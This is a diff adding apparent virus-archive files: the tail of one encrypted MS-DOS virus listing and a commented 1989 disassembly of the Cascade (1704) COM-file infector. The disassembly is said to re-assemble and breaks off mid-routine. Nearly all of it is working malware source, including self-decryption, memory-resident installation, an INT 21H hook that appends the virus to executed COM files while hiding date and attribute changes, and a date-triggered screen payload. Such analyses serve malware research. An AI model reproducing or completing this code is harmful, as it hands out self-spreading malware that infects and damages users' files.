01h, 76h, 0Ch + db 2Bh, 88h, 37h,0BEh,0F3h,0CDh + db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h + db 0CCh, 66h,0D8h,0CCh,0E3h, 07h + db 9Bh,0FCh,0DCh + db 57h +loc_27: + mov bp,0F7F3h + xchg ax,di + aaa ; Ascii adjust + in al,dx ; port 0C0h, DMA-2 bas&add ch 0 + stc ; Set carry flag + db 0C0h,0E9h + db 0C3h,0B6h, 29h, 76h,0F2h,0B1h + db 0D8h, 33h,0E4h,0B5h,0EFh, 23h + db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh + db 0AFh,0EFh, 72h, 03h,0D6h, 00h + db 33h,0D5h,0FAh, 87h, 3Ah, 83h + db 0C5h,0B5h, 4Bh, 4Fh,0AFh + db 0FCh, 37h, 4Ah,0F4h + db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h + db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h + db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h + db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h + db 0E8h, 49h,0CCh, 83h,0CFh,0DCh + db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh + db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h + db 09h,0CFh, 7Eh + db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h + db 0DCh,0C3h, 23h, 70h, 13h, 28h + db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh + db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh + db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h + db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h + db 79h,0E4h, 8Dh,0CFh,0ECh, 49h + db 0C8h, 83h,0C3h, 0Fh,0EFh, 7Ah + db 0CCh, 3Fh,0D7h,0D8h, 79h,0FCh + db 0AFh,0EFh, 14h, 23h,0E1h, 93h + db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h + db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h + db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h + db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh + db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh + db 0E8h +loc_33: + stc ; Set carry flag + mov cl,0B3h + mov sp,4BBEh + cmc ; Complement carry + db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h + db 49h, 85h, 38h,0D7h,0C5h, 89h + db 85h + db 2Ch, 05h,0AAh,0E7h,0F1h, 79h + db 0E5h,0B6h,0E5h, 22h, 96h,0E4h + db 11h, 00h, 69h, 2Ch,0B4h,0ABh + db 0A9h,0E9h, 35h,0ECh,0F4h, 58h + db 58h, 52h, 0Dh, 00h,0BEh, 43h + db 03h, 81h,0D6h, 4Ch, 94h,0F7h + db 48h, 9Eh,0F2h, 57h,0E6h,0E2h + db 1Eh, 15h, 43h,0BBh,0BDh,0B0h + db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h + db 78h, 08h, 38h,0E4h, 90h,0C7h + db 70h,0C2h,0C1h + db 0Ch + db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h + db 79h, 1Eh, 18h,0E4h,0B6h,0E7h + db 19h, 6Ch,0FCh,0B6h,0EFh, 86h + db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h + db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h + db 0F7h, 79h, 62h, 5Ah,0F3h, 82h + db 0Dh, 5Fh + db 09h,0B4h,0F1h,0BCh, 21h,0B1h + db 0E0h,0B0h,0B1h, 65h, 36h, 78h + db 34h, 00h,0D0h,0A0h,0F3h, 78h + db 0CEh,0C1h, 00h, 17h, 26h,0C1h + db 0C4h, 94h,0CFh, 79h, 0Ah, 00h + db 0F0h,0A6h,0F3h, 11h, 60h,0E4h + db 0BAh,0E7h, 92h,0F0h, 58h, 34h + db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h + db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh + db 0AEh, 03h, 76h,0F5h, 85h, 31h + db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h + db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh + db 0E3h, 0Ch, 10h,0ABh, 10h, 00h + db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h + db 0C0h,0E2h, 38h, 24h,0A3h, 96h + db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh + db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h + db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh + db 42h, 84h,0F0h,0CEh, 2Dh,0F9h + db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch + db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh + db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh + db 0E2h, 92h, 1Ch,0D1h +loc_37: + sub cx,[bx-7Eh] + db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h + db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh + db 03h,0F1h, 1Ch, 77h,0FDh,0F2h + db 01h, 07h,0DCh, 51h,0B2h,0EFh + db 21h,0ABh + db 0Dh, 08h + db 24h,0E4h + db 0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h + db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h + db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h + db 49h,0C2h,0E7h, 41h,0F2h,0F4h + db 0BBh, 23h,0F2h,0BFh,0E1h, 66h + db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h + db 0A5h,0F7h, 46h,0FDh, 03h,0DEh + db 4Ah,0E4h, 94h,0C7h, 04h,0C4h + db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh + db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h + db 0D0h, 94h + db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h + db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh + db 0F5h + +locloop_40: + movsw ; Mov [si] to es:[di] +;* mov dx,offset loc_46 ;* + db 0BAh, 84h,0F0h + mov ax,ds:data_45e + cmpsb ; Cmp [si] to es:[di] + db 0F3h,0F7h, 56h,0A1h,0F3h, 10h + db 2Eh, 14h,0C4h,0B4h,0E7h, 41h + db 80h,0EFh, 4Fh, 96h,0F3h,0CDh + db 0F0h, 90h,0F3h,0B8h,0CDh, 63h + db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh + db 45h, 02h,0C1h, 09h,0B1h, 53h + db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh + db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h + db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch + db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh + db 88h,0DEh,0AEh,0A1h,0F3h, 42h + db 0F6h, 1Ah,0B0h, 10h, 64h, 12h + db 0Ah, 60h, 18h, 0Ah,0F3h, 11h + db 9Ch, 20h, 1Ah,0EAh, 09h, 80h + db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h + db 90h,0C3h, 48h,0C0h, 9Dh,0F3h + db 47h,0F6h, 08h, 34h,0C8h,0D8h + db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h + db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h + db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh + db 6Ah, 72h, 78h,0F0h,0BDh, 70h + db 48h,0C8h,0C4h,0A5h,0F7h, 85h + db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h + db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch + db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h + db 30h, 0Ch, 2Ah,0F0h, 38h, 60h + db 97h,0CFh, 30h, 34h, 72h,0D0h + db 0A1h,0F3h, 0Fh, 10h, 20h, 52h + db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h + db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch + db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh + db 0ECh,0A5h,0F5h, 09h, 58h,0F2h + db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h + db 06h, 69h, 1Ch,0A8h, 92h,0E1h + db 0Bh,0BFh, 11h, 16h, 93h,0D2h + db 0Ah, 14h, 93h, 0Dh,0E0h, 34h + db 0C4h, 91h,0C7h,0CBh,0B7h, 96h + db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h + db 0DCh, 11h,0E0h,0BCh,0E3h, 93h + db 0A3h,0FCh + +locloop_41: + in al,0E0h ; port 0E0h, Memory encode reg2 + db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h + db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h + db 60h,0A2h, 23h,0EEh, 8Fh,0CFh + db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h + db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h + db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh + db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah + db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh + db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh + db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h + db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh + db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h + db 20h,0FDh, 2Ch, 35h, 07h, 2Ch + db 0F4h, 08h, 59h,0F3h,0FAh, 82h + db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h + db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h + db 9Ch,0FFh, 85h,0F3h + +locloop_42: + jbe loc_45 ; Jump if below or = + clc ; Clear carry flag + mov sp,0ECC8h + inc dx + loopnz locloop_41 ; Loop if zf=0, cx>0 + + retn + db 35h, 94h + db 97h + db 0AAh +loc_45: + esc 4,[bx+di] ; coprocessor escape + esc 0,cl ; coprocessor escape + db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh + db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h + db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h + db 88h, 82h, 83h, 87h, 08h, 42h + db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h + db 0F7h, 4Bh, 57h,0E8h, 12h, 11h + db 46h, 59h,0C5h,0E2h, 5Ch,0CDh + db 0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh + db 70h,0C8h,0E8h,0F3h,0F7h,0E0h + db 0F7h,0CFh, 85h, 88h, 2Ch, 04h + db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch + db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh + db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh + db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h + db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1704.asm b/MSDOS/Virus.MSDOS.Unknown.1704.asm new file mode 100644 index 00000000..0f93af6a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1704.asm @@ -0,0 +1,919 @@ + page 65,132 + title The 'Cascade' Virus (1704 version) +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The 'Cascade' Virus (1704 version) +; Disassembled by Joe Hirst, March 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + + ; The virus occurs attached to the end of a COM file. The first + ; three bytes of the program are stored in the virus, and replaced + ; by a branch to the beginning of the virus. + + ; The disassembly has been tested by re-assembly using MASM 5.0. + +RAM SEGMENT AT 400H + + ; System data + + ORG 4EH +BW044E DW ? ; VDU display start address + + ORG 6CH +BW046C DW ? ; System clock + +RAM ENDS + +MCB SEGMENT AT 0 ; Memory control block references + +MB0000 DB ? ; MCB signature +MW0001 DW ? ; MCB owner +MW0003 DW ? ; MCB size + +MCB ENDS + +OPROG SEGMENT AT 0 ; Original program references + + ORG 100H +OW0100 DW ? +OB0102 DB ? + +OPROG ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + ASSUME CS:CODE,DS:OPROG + +VIRLEN EQU OFFSET ENDADR-START +MAXLEN EQU OFFSET START-ENDADR-20H +JMPADR = OFFSET START-ENDADR-2 + + ORG 16H +DW0016 DW ? ; PSP parent ID + + ORG 2CH +DW002C DW ? ; PSP environment + + ORG 36H +DW0036 DW ? ; FHT segment + + ORG 100H + +START: + +DB0100 DB 1 ; Encryption indicator + + ; Virus entry point + +ENTRY: CLI + MOV BP,SP ; Save stack pointer + CALL BP0010 ; \ Get address of BP0010 +BP0010: POP BX ; / + SUB BX,OFFSET BP0010+2AH ; Standardise relocation reg + TEST DB0100[BX+2AH],1 ; Is virus encrypted + JZ BP0030 ; Branch if not + LEA SI,BP0030[BX+2AH] ; Address start of encrypted area + MOV SP,OFFSET ENDADR-BP0030 ; Length of encrypted area +BP0020: XOR [SI],SI ; \ Decrypt + XOR [SI],SP ; / + INC SI ; \ Next address + DEC SP ; / + JNZ BP0020 ; Repeat for all area +BP0030: MOV SP,BP ; Restore stack pointer + JMP BP0040 ; Branch past data + + ; Data + +PROGRM EQU THIS DWORD +PRG_OF DW 100H ; Original program offset +PRG_SGIDW 1021H ; Original program segment + +INITAX DW 0 ; Initial AX value +PROG_1 DW 2DE9H ; \ First three bytes of program +PROG_2 DB 0DH ; / + DB 0, 0 + +I1CBIO EQU THIS DWORD +I1C_OF DW 0FF53H ; Interrupt 1CH offset +I1C_SG DW 0F000H ; Interrupt 1CH segment + +I21BIO EQU THIS DWORD +I21_OF DW 1460H ; Interrupt 21H offset +I21_SG DW 026AH ; Interrupt 21H segment + +I28BIO EQU THIS DWORD +I28_OF DW 1445H ; Interrupt 28H offset +I28_SG DW 0270H ; Interrupt 28H segment + + DW 0 ; - not referenced +F_ATTR DW 0 ; File attributes +F_DATE DW 0E71H ; File date +F_TIME DW 601FH ; File time +F_PATH EQU THIS DWORD +PATHOF DW 044EH ; File pathname offset +PATHSG DW 20FFH ; File pathname segment +F_SIZ1 DW 62DBH ; File size - low word +F_SIZ2 DW 0 ; File size - high word +JUMP_1 DB 0E9H ; \ Jump instruction +JUMP_2 DW 1D64H ; / +NUMCOL DB 0 ; Number of display columns +NUMROW DB 0 ; Number of display rows +C80_SW DB 0 ; 80 column text switch +CURCHA DB 0 ; Current character +CURATT DB 0 ; Current attributes +SWITCH DB 8 ; Switches + ; 01 Int 1CH active + ; 02 Switch 2 + ; 04 Switch 3 - not used + ; 08 No display +RAM_SG DW 0 ; Video RAM segment +VDURAM DW 0 ; VDU display start address +LOOPCT DW 04F8H ; Timed loop count +I1CCNT DW 0FDAH ; Int 1CH count +I1CMAX DW 0FDAH ; Int 1CH random number maximum +NUMPOS DW 0 ; Number of display positions +RANPOS DW 1 ; Number of lines to affect +RANDOM DW 8FB2H, 0AH, 0, 0, 100H, 0, 1414H, 14H + + ; Main program start + +BP0040: CALL BP0050 ; \ Get address of BP0050 +BP0050: POP BX ; / + SUB BX,OFFSET BP0050+2AH ; Standardise relocation reg + MOV PRG_SG[BX+2AH],CS ; Save original program segment + MOV INITAX[BX+2AH],AX ; Save initial AX value + MOV AX,PROG_1[BX+2AH] ; Get first 2 bytes of program + MOV OW0100,AX ; Replace them + MOV AL,PROG_2[BX+2AH] ; Get third byte of program + MOV OB0102,AL ; Replace it + PUSH BX + MOV AH,30H ; Get DOS version number function + INT 21H ; DOS service + POP BX + CMP AL,2 ; Version 2.X or above? + JB BP0060 ; Branch if not + MOV AX,4BFFH ; Is virus active function + XOR DI,DI ; Clear register + XOR SI,SI ; Clear register + INT 21H ; DOS service + CMP DI,55AAH ; Is virus already active + JNE BP0070 ; Branch if not +BP0060: STI + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV AX,INITAX[BX+2AH] ; Restore initial AX value + JMP PROGRM[BX+2AH] ; Branch to original program + +BP0070: PUSH BX + MOV AX,3521H ; Get interrupt 21H function + INT 21H ; DOS service + MOV AX,BX ; Move interrupt 21H offset + POP BX + MOV I21_OF[BX+2AH],AX ; Save interrupt 21H offset + MOV I21_SG[BX+2AH],ES ; Save interrupt 21H segment + MOV AX,0F000H ; \ + MOV ES,AX ; ) Address BIOS + MOV DI,0E008H ; / + CMP WORD PTR ES:[DI],'OC' ; \ Branch if not IBM BIOS + JNE BP0080 ; / + CMP WORD PTR ES:[DI+2],'RP' ; \ Branch if not IBM BIOS + JNE BP0080 ; / + CMP WORD PTR ES:[DI+4],' .' ; \ Branch if not IBM BIOS + JNE BP0080 ; / + CMP WORD PTR ES:[DI+6],'BI' ; \ Branch if not IBM BIOS + JNE BP0080 ; / + CMP WORD PTR ES:[DI+8],'M' ; \ IBM BIOS + JE BP0060 ; / + + ; Install virus + + ASSUME ES:MCB,DS:NOTHING +BP0080: MOV AX,007BH ; Load size of virus in paragraphs + MOV BP,CS ; Get current segment + DEC BP ; \ Address back to MCB + MOV ES,BP ; / + MOV SI,DW0016 ; Get parent ID + MOV MW0001,SI ; Store as owner in MCB + MOV DX,MW0003 ; Get MCB size + MOV MW0003,AX ; Store virus size + MOV MB0000,4DH ; Store MCB identification + SUB DX,AX ; Subtract virus from original size + DEC DX ; + INC BP ; Forward from MCB + ADD BP,AX ; Add size of virus + INC BP ; And of another MCB + MOV ES,BP ; Address new PSP segment + PUSH BX + MOV AH,50H ; Set current PSP function + MOV BX,BP ; New PSP segment + INT 21H ; DOS service + POP BX + XOR DI,DI ; Clear register + PUSH ES ; \ Set stack segment to new PSP + POP SS ; / + PUSH DI + LEA DI,CPY040[BX+2AH] ; Address end of virus + MOV SI,DI ; And for source + MOV CX,VIRLEN ; Get length of virus + STD ; Going downwards + REPZ MOVSB ; Copy virus + PUSH ES ; Push new segment + LEA CX,BP0090[BX+2AH] ; \ And next instruction + PUSH CX ; / + RETF ; ... and load them + + ; Now running in virus at end of new program segment + +BP0090: MOV PRG_SG[BX+2AH],CS ; New segment in program address + LEA CX,DB0100[BX+2AH] ; Get length of original program + REPZ MOVSB ; Copy original program to new PSP + MOV DW0036,CS ; New segment in handle table address + DEC BP ; \ Address back to MCB + MOV ES,BP ; / + MOV MW0003,DX ; Store original program size + MOV MB0000,5AH ; Store MCB ident (last) + MOV MW0001,CS ; Store CS as owner in MCB + INC BP ; \ Forward again to PSP + MOV ES,BP ; / + PUSH DS ; \ Set ES to DS + POP ES ; / + PUSH CS ; \ Set DS to CS + POP DS ; / + LEA SI,DB0100[BX+2AH] ; Address start of virus + MOV DI,OFFSET DB0100 ; Start of program area in first area + MOV CX,VIRLEN ; Get length of virus + CLD ; Copy forwards + REPZ MOVSB ; Copy virus to start of first area + PUSH ES ; Push segment of first area + LEA AX,BP0100 ; \ Offset of next instruction + PUSH AX ; / + RETF ; ... and load them + + ; Now running in installed virus, first area + + ASSUME ES:NOTHING +BP0100: MOV DW002C,0 ; No environment pointer + MOV DW0016,CS ; Is its own parent + PUSH DS + LEA DX,INT_21 ; Interrupt 21H routine + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV AX,2521H ; Set interrupt 21H function + INT 21H ; DOS service + POP DS + MOV AH,1AH ; Set DTA function + MOV DX,0080H ; DTA address + INT 21H ; DOS service + CALL GETCLK ; Copy system clock + MOV AH,2AH ; Get date function + INT 21H ; DOS service + CMP CX,07C4H ; Year 1988? + JA BP0130 ; Branch if after 1988 + JE BP0110 ; Branch if 1988 + CMP CX,07BCH ; Year 1980? + JNE BP0130 ; Branch if not + PUSH DS + MOV AX,3528H ; Get interrupt 28H function + INT 21H ; DOS service + MOV I28_OF,BX ; Save interrupt 28H offset + MOV I28_SG,ES ; Save interrupt 28H segment + MOV AX,2528H ; Set interrupt 28H function + MOV DX,OFFSET INT_28 ; Int 28H routine address + PUSH CS ; \ Set DS to CS + POP DS ; / + INT 21H ; DOS service + POP DS + OR SWITCH,8 ; Set on No display switch + JMP BP0120 + + ; Year is 1988 + +BP0110: CMP DH,0AH ; October? + JB BP0130 ; Branch if not +BP0120: CALL TIMCYC ; Time one clock cycle + MOV AX,1518H ; Upper limit - 5400 + CALL RNDNUM ; Create random number + INC AX ; Add to random number + MOV I1CCNT,AX ; Set Int 1CH count + MOV I1CMAX,AX ; Set Int 1CH random no maximum + MOV RANPOS,1 ; Set num of lines to affect to 1 + MOV AX,351CH ; Get interrupt 1CH function + INT 21H ; DOS service + MOV I1C_OF,BX ; Save interrupt 1CH offset + MOV I1C_SG,ES ; Save interrupt 1CH segment + PUSH DS + MOV AX,251CH ; Set interrupt 1CH function + MOV DX,OFFSET INT_1C ; Int 1CH routine address + PUSH CS ; \ Set DS to CS + POP DS ; / + INT 21H ; DOS service + POP DS +BP0130: MOV BX,-2AH ; Set up relocation register + JMP BP0060 ; Branch to start program + + ; Interrupt 21H routine + +INT_21: CMP AH,4BH ; Load function? + JE I_2106 ; Branch if yes +I_2102: JMP I21BIO ; Branch to original int 21H + + ; Virus call + +I_2104: MOV DI,55AAH ; Virus call - signal back + LES AX,I21BIO ; Load return address + MOV DX,CS ; Load segment + IRET + + ; Load and execute function + +I_2106: CMP AL,0FFH ; Is this a virus call? + JE I_2104 ; Branch if yes + CMP AL,0 ; Load and execute? + JNE I_2102 ; Branch if not + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + PUSH ES + PUSH DS + MOV PATHOF,DX ; Save pathname offset + MOV PATHSG,DS ; Save pathname segment + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV AX,3D00H ; Open handle function + INT 21H ; DOS service + JB I_2110 ; Branch if error + MOV BX,AX ; Move file handle + MOV AX,5700H ; Get file date and time function + INT 21H ; DOS service + MOV F_DATE,DX ; Save file date + MOV F_TIME,CX ; Save file time + MOV AH,3FH ; Read handle function + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV DX,OFFSET PROG_1 ; \ First three bytes of program + MOV CX,3 ; / + INT 21H ; DOS service + JB I_2110 ; Branch if error + CMP AX,CX ; Correct length read? + JNE I_2110 ; Branch if error + MOV AX,4202H ; Move file pointer (EOF) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + MOV F_SIZ1,AX ; File size - low word + MOV F_SIZ2,DX ; File size - high word + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + CMP PROG_1,5A4DH ; Is it an EXE file? + JNE I_2108 ; Branch if not + JMP I_2124 ; Dont infect + +I_2108: CMP F_SIZ2,0 ; File size - high word + JA I_2110 ; Branch if file too big + CMP F_SIZ1,MAXLEN ; Maximum file size? + JBE I_2112 ; Branch if file not too big +I_2110: JMP I_2124 ; Dont infect + +I_2112: CMP BYTE PTR PROG_1,0E9H ; Does program start with a branch + JNE I_2114 ; Branch if not + MOV AX,F_SIZ1 ; Get file size - low word + ADD AX,WORD PTR JMPADR ; Convert to infected offset + CMP AX,PROG_1+1 ; Is it the same + JE I_2110 ; Branch if already infected +I_2114: MOV AX,4300H ; Get file attributes function + LDS DX,F_PATH ; Pathname pointer + INT 21H ; DOS service + JB I_2110 ; Branch if error + MOV F_ATTR,CX ; Save file attributes + XOR CL,20H ; Change archive bit + TEST CL,27H ; Are there any attributes to change + JZ I_2116 ; Branch if not + MOV AX,4301H ; Set file attributes function + XOR CX,CX ; No attributes + INT 21H ; DOS service + JB I_2110 ; Branch if error +I_2116: MOV AX,3D02H ; Open handle (R/W) function + INT 21H ; DOS service + JB I_2110 ; Branch if error + MOV BX,AX ; Move file handle + MOV AX,4202H ; Move file pointer (EOF) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + CALL CPYVIR ; Copy virus to program + JNB I_2118 ; Branch if no error + MOV AX,4200H ; Move file pointer (Start) function + MOV CX,F_SIZ2 ; File size - high word + MOV DX,F_SIZ1 ; File size - low word + INT 21H ; DOS service + MOV AH,40H ; Write handle function + XOR CX,CX ; Zero length (reset length} + INT 21H ; DOS service + JMP I_2120 ; Reset file details + +I_2118: MOV AX,4200H ; Move file pointer (Start) function + XOR CX,CX ; \ No displacement + XOR DX,DX ; / + INT 21H ; DOS service + JB I_2120 ; Branch if error + MOV AX,F_SIZ1 ; Get file size - low word + ADD AX,0FFFEH ; Convert to jump offset + MOV JUMP_2,AX ; Store in jump instruction + MOV AH,40H ; Write handle function + MOV DX,OFFSET JUMP_1 ; Address to jump instruction + MOV CX,3 ; Length of jump instruction + INT 21H ; DOS service +I_2120: MOV AX,5701H ; Set file date and time function + MOV DX,F_DATE ; Get old file date + MOV CX,F_TIME ; Get old file time + INT 21H ; DOS service + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV CX,F_ATTR ; Get old file attributes + TEST CL,7 ; System, read only or hidden? + JNZ I_2122 ; Branch if yes + TEST CL,20H ; Archive? + JNZ I_2124 ; Branch if yes +I_2122: MOV AX,4301H ; Set file attributes function + LDS DX,F_PATH ; Pathname pointer + INT 21H ; DOS service +I_2124: POP DS + POP ES + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + JMP I_2102 ; Original interrupt 21H + + ; Create random number + +RNDNUM: PUSH DS + PUSH CS ; \ Set DS to CS + POP DS ; / + PUSH BX + PUSH CX + PUSH DX + PUSH AX ; Save multiplier + MOV CX,7 ; Seven words to move + MOV BX,OFFSET RANDOM+14 ; Last word of randomiser + PUSH [BX] ; Save last word +RND010: MOV AX,[BX-2] ; Get previous word + ADC [BX],AX ; Add to current word + DEC BX ; \ Address previous word + DEC BX ; / + LOOP RND010 ; Repeat for each word + POP AX ; Retrieve last word + ADC [BX],AX ; Add to first word + MOV DX,[BX] ; Get result + POP AX ; Recover multiplier + OR AX,AX ; Is there a multiplier? + JZ RND020 ; Branch if not + MUL DX ; Multiply random number +RND020: MOV AX,DX ; Move result + POP DX + POP CX + POP BX + POP DS + RET + + ; Copy system clock + +GETCLK: PUSH DS + PUSH ES + PUSH SI + PUSH DI + PUSH CX + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV CX,0040H ; \ Set DS to system RAM + MOV DS,CX ; / + MOV DI,OFFSET RANDOM ; Randomizer work area + MOV SI,006CH ; Address system clock + MOV CX,8 ; Eight bytes to copy + CLD + REPZ MOVSW ; Copy system clock + POP CX + POP DI + POP SI + POP ES + POP DS + RET + + ; Get character and attributes + + ASSUME DS:CODE +GETCHA: PUSH SI + PUSH DS + PUSH DX + MOV AL,DH ; Get row number + MUL NUMCOL ; Number of visible columns + MOV DH,0 ; Clear top of register + ADD AX,DX ; Add column number + SHL AX,1 ; Multiply by two + ADD AX,VDURAM ; Add VDU display start address + MOV SI,AX ; Move character pointer + TEST C80_SW,0FFH ; Test 80 column text switch + MOV DS,RAM_SG ; Video RAM segment + JZ GTC030 ; Branch if switch off + MOV DX,03DAH ; VDU status register + CLI +GTC010: IN AL,DX ; Get VDU status + TEST AL,8 ; Is it frame flyback time + JNZ GTC030 ; Branch if yes + TEST AL,1 ; Test toggle bit + JNZ GTC010 ; Branch if on +GTC020: IN AL,DX ; Get VDU status + TEST AL,1 ; Test toggle bit + JZ GTC020 ; Branch if off +GTC030: LODSW ; Load character and attribute + STI + POP DX + POP DS + POP SI + RET + + ; Store character and attributes + +STOCHA: PUSH DI + PUSH ES + PUSH DX + PUSH BX + MOV BX,AX + MOV AL,DH ; Get row number + MUL NUMCOL ; Number of visible columns + MOV DH,0 ; Clear top of register + ADD AX,DX ; Add column number + SHL AX,1 ; Multiply by two + ADD AX,VDURAM ; Add VDU display start address + MOV DI,AX ; Move character pointer + TEST C80_SW,0FFH ; Test 80 column text switch + MOV ES,RAM_SG ; Video RAM segment + JZ STO030 ; Branch if switch off + MOV DX,03DAH ; VDU status register + CLI +STO010: IN AL,DX ; Get VDU status + TEST AL,8 ; Is it frame flyback time + JNZ STO030 ; Branch if yes + TEST AL,1 ; Test toggle bit + JNZ STO010 ; Branch if on +STO020: IN AL,DX ; Get VDU status + TEST AL,1 ; Test toggle bit + JZ STO020 ; Branch if off +STO030: MOV AX,BX + STOSB ; Store character and attribute + STI + POP BX + POP DX + POP ES + POP DI + RET + + ; Delay loop + +DELAY: PUSH CX +DEL010: PUSH CX + MOV CX,LOOPCT ; Get timed loop count +DEL020: LOOP DEL020 + POP CX + LOOP DEL010 + POP CX + RET + + ; Toggle speaker drive + +CH_SND: PUSH AX + IN AL,61H ; Get port B + XOR AL,2 ; Toggle speaker drive + AND AL,0FEH ; Switch off speaker modulate + OUT 61H,AL ; Rewrite port B + POP AX + RET + + ; Is character 0, 32 or 255? + +IGNORE: CMP AL,0 ; Is it a zero? + JE IGN010 ; Branch if yes + CMP AL,20H ; Is it a space? + JE IGN010 ; Branch if yes + CMP AL,0FFH ; Is it FF? + JE IGN010 ; Branch if yes + CLC + RET + +IGN010: STC + RET + + ; Graphic display character + +GRAPHD: CMP AL,0B0H ; Is it below 176? + JB GRA010 ; Branch if yes + CMP AL,0DFH ; Is it above 223? + JA GRA010 ; Branch if yes + STC + RET + +GRA010: CLC + RET + + ; Time one clock cycle + +TIMCYC: PUSH DS + MOV AX,0040H ; \ Set DS to system RAM + MOV DS,AX ; / + STI + ASSUME DS:RAM + MOV AX,BW046C ; Get low word of system clock +TIM010: CMP AX,BW046C ; Has clock changed? + JE TIM010 ; Branch if not + XOR CX,CX ; Clear register + MOV AX,BW046C ; Get low word of system clock +TIM020: INC CX ; Increment count + JZ TIM040 ; Branch if now zero + CMP AX,BW046C ; Has clock changed? + JE TIM020 ; Branch if not +TIM030: POP DS + ASSUME 